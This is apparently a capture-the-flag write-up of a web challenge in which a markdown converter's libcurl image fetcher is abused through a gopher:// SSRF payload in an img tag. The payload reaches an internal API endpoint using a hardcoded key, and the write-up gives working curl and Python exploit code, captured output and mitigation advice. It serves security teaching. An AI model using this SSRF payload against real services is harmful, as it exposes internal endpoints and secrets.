Amazon AppSec CTF: PageOneHTML
Executive Summary
- Challenge: PageOneHTML
- Category: Web Security
- Vulnerability: Server-Side Request Forgery (SSRF) via gopher:// protocol
- Impact: Access to internal API endpoint leading to flag disclosure
- Flags:
- Local:
HTB{f4k3_fl4g_f0r_t3st1ng}
- Remote:
HTB{l1bcurL_pla7h0r4_0f_pr0tocOl5}
- Local:
Source-to-Sink Analysis
1. Entry Point - User Input (Source)
The vulnerability starts at /api/convert
endpoint which accepts user-controlled markdown content:
// routes/index.js:15-28
router.post('/api/convert', async (req, res) => {
const { markdown_content, port_images } = req.body; // User input
if (markdown_content) {
html = MDHelper.makeHtml(markdown_content); // Convert MD to HTML
if (port_images) { // If port_images is true
return ImageConverter.PortImages(html) // Process images
.then(newHTML => res.json({ content: newHTML }))
.catch(() => res.json({ content: html }));
}
return res.json({ content: html });
}
return res.status(403).send(response('Missing parameters!'));
});
2. Image Processing - Protocol Confusion
The ImageConverter
extracts all <img>
tags and processes their src
attributes:
// helpers/ImageConverter.js:5-28
module.exports = {
PortImages(html) {
return new Promise(async (resolve, reject) => {
try {
const $ = cheerio.load(html);
function downloader(el) {
imgSrc = $(el).attr('src'); // Extract src attribute
return Promise.resolve(ImageDownloader.downloadImage(imgSrc));
}
Promise.all(
$('img')
.map(async (i, el) => {
newSrc = await downloader(el); // Download and convert
$(el).attr('src', newSrc) // Replace with data URI
})
.get()
).then(() => {
return resolve($.html());
})
} catch (e) {
console.log(e);
reject(e);
}
});
}
};
3. The Vulnerable Sink - libcurl Protocol Support
The critical vulnerability lies in ImageDownloader.js
using node-libcurl
without protocol validation:
// helpers/ImageDownloader.js:29-49
module.exports = {
async downloadImage(url) {
return new Promise(async (resolve, reject) => {
curly.get(url) // VULNERABILITY: Accepts any protocol supported by libcurl
.then(resp => {
buffer = Buffer.from(resp.data,'utf8')
if (isPng(buffer))
dataUri = "data:image/png;base64,";
else if (isJpg(buffer))
dataUri = "data:image/jpg;base64,";
else
dataUri = "data:image/svg+xml;base64"; // Non-images treated as SVG
return resolve(`${dataUri} ${buffer.toString('base64')}`); // Leak response
})
.catch(e => {
console.log(e)
return resolve(url);
})
});
}
};
Key vulnerabilities:
curly.get(url)
accepts ANY protocol supported by libcurl (http, https, ftp, gopher, dict, file, etc.)- Non-image responses are base64-encoded and returned, leaking their content
- No URL validation or protocol allowlisting
4. The Target - Internal API Endpoint
The internal /api/dev
endpoint is protected only by IP and API key:
// routes/index.js:30-38
router.get('/api/dev', async (req, res) => {
// Only allow requests from localhost
if (req.ip != '127.0.0.1') return res.status(403).send(response('Access denied!'));
if (req.headers["x-api-key"] == "934caf984a4ca94817ea6d87d37af4b3") {
return res.send(execSync('./flagreader.bin').toString()); // Flag!
}
return res.status(403).send(response('missing apikey!'));
});
Exploit Chain
Exploit Flow Diagram
Payload Construction
Step 1: Craft the Raw HTTP Request
We need to send this HTTP request to the internal endpoint:
GET /api/dev HTTP/1.1
Host: 127.0.0.1
x-api-key: 934caf984a4ca94817ea6d87d37af4b3
Connection: close
Step 2: Convert to Gopher URL
The gopher protocol format: gopher://host:port/_<data>
- URL-encode spaces as
%20
- URL-encode CRLF as
%0D%0A
- Prefix the data with
_
gopher://127.0.0.1:1337/_GET%20/api/dev%20HTTP/1.1%0D%0AHost:%20127.0.0.1%0D%0Ax-api-key:%20934caf984a4ca94817ea6d87d37af4b3%0D%0AConnection:%20close%0D%0A%0D%0A
Step 3: Embed in HTML Image Tag
<img src="gopher://127.0.0.1:1337/_GET%20/api/dev%20HTTP/1.1%0D%0AHost:%20127.0.0.1%0D%0Ax-api-key:%20934caf984a4ca94817ea6d87d37af4b3%0D%0AConnection:%20close%0D%0A%0D%0A">
Exploitation
Local Testing (Docker Container)
- Send the exploit payload:
curl -s http://127.0.0.1:1337/api/convert \
-H 'Content-Type: application/json' \
--data-binary '{
"markdown_content": "<img src=\"gopher://127.0.0.1:1337/_GET%20/api/dev%20HTTP/1.1%0D%0AHost:%20127.0.0.1%0D%0Ax-api-key:%20934caf984a4ca94817ea6d87d37af4b3%0D%0AConnection:%20close%0D%0A%0D%0A\">",
"port_images": true
}'
- Extract and decode the base64 response:
curl -s http://127.0.0.1:1337/api/convert \
-H 'Content-Type: application/json' \
--data-binary '{"markdown_content":"<img src=\"gopher://127.0.0.1:1337/_GET%20/api/dev%20HTTP/1.1%0D%0AHost:%20127.0.0.1%0D%0Ax-api-key:%20934caf984a4ca94817ea6d87d37af4b3%0D%0AConnection:%20close%0D%0A%0D%0A\">","port_images":true}' \
| jq -r .content \
| sed -n 's/.*base64 \(.*\)".*/\1/p' \
| tr -d '\n' \
| base64 -d
Local Output:
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: text/html; charset=utf-8
Content-Length: 27
Date: Thu, 11 Sep 2025 14:46:35 GMT
Connection: close
HTB{f4k3_fl4g_f0r_t3st1ng}
Remote Exploitation
Python exploit script:
import json
import re
import base64
import urllib.request
# Target URL
url = "http://94.237.53.82:31404/api/convert"
# Gopher SSRF payload
payload = {
"markdown_content": '<img src="gopher://127.0.0.1:1337/_GET%20/api/dev%20HTTP/1.1%0D%0AHost:%20127.0.0.1%0D%0Ax-api-key:%20934caf984a4ca94817ea6d87d37af4b3%0D%0AConnection:%20close%0D%0A%0D%0A">',
"port_images": True
}
# Send request
req = urllib.request.Request(
url,
data=json.dumps(payload).encode(),
headers={"Content-Type": "application/json"}
)
# Get response
response = urllib.request.urlopen(req, timeout=15).read().decode()
obj = json.loads(response)
# Extract base64 from data URI
content = obj.get("content", "")
match = re.search(r"base64\s+([A-Za-z0-9+/=\n\r]+)", content)
if match:
b64_data = match.group(1).replace("\n", "").replace("\r", "")
decoded = base64.b64decode(b64_data).decode()
print(decoded)
Remote Output:
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: text/html; charset=utf-8
Content-Length: 35
Date: Thu, 11 Sep 2025 14:47:34 GMT
Connection: close
HTB{l1bcurL_pla7h0r4_0f_pr0tocOl5}
Root Cause Analysis
Vulnerability Chain
Security Issues Identified
- Protocol Confusion -
node-libcurl
accepts all protocols without validation - SSRF - No egress filtering or destination validation
- Response Leakage - Non-image content encoded and returned
- Weak Access Control - Internal endpoint relies on source IP only
- Static Credentials - Hardcoded API key in source code
Mitigation Recommendations
1. Protocol Allowlisting
// Example fix for ImageDownloader.js
const ALLOWED_PROTOCOLS = ['http:', 'https:'];
async downloadImage(url) {
const parsedUrl = new URL(url);
if (!ALLOWED_PROTOCOLS.includes(parsedUrl.protocol)) {
throw new Error('Invalid protocol');
}
// ... rest of the code
}
2. SSRF Protection
// Block internal networks
const BLOCKED_IPS = [
'127.0.0.0/8', // Loopback
'10.0.0.0/8', // Private network
'172.16.0.0/12', // Private network
'192.168.0.0/16', // Private network
'169.254.0.0/16', // Link-local
'fd00::/8', // IPv6 private
'::1/128' // IPv6 loopback
];
function isInternalIP(hostname) {
// Implement IP range checking
// DNS resolution and validation
}
3. Content Type Validation
// Strict image validation
async downloadImage(url) {
const response = await fetch(url);
const contentType = response.headers.get('content-type');
if (!contentType?.startsWith('image/')) {
throw new Error('Not an image');
}
const buffer = await response.buffer();
if (!isPng(buffer) && !isJpg(buffer) && !isSvg(buffer)) {
throw new Error('Invalid image format');
}
// ... process valid image
}
4. Remove Internal Debug Endpoints
- Remove
/api/dev
endpoint in production - Use proper authentication mechanisms (OAuth, JWT)
- Implement rate limiting and monitoring
Timeline
- Initial Analysis - Code review reveals SSRF vector via
node-libcurl
- Protocol Testing - Confirmed gopher:// protocol support
- Payload Development - Crafted gopher URL with HTTP request
- Local Exploitation - Retrieved test flag from Docker environment
- Remote Exploitation - Successfully extracted production flag
Lessons Learned
- Never trust user input - All URLs should be validated
- Principle of least privilege - Use minimal protocol support
- Defense in depth - Multiple security layers needed
- Secure defaults - Libraries should be configured securely
- Regular security audits - Third-party dependencies need review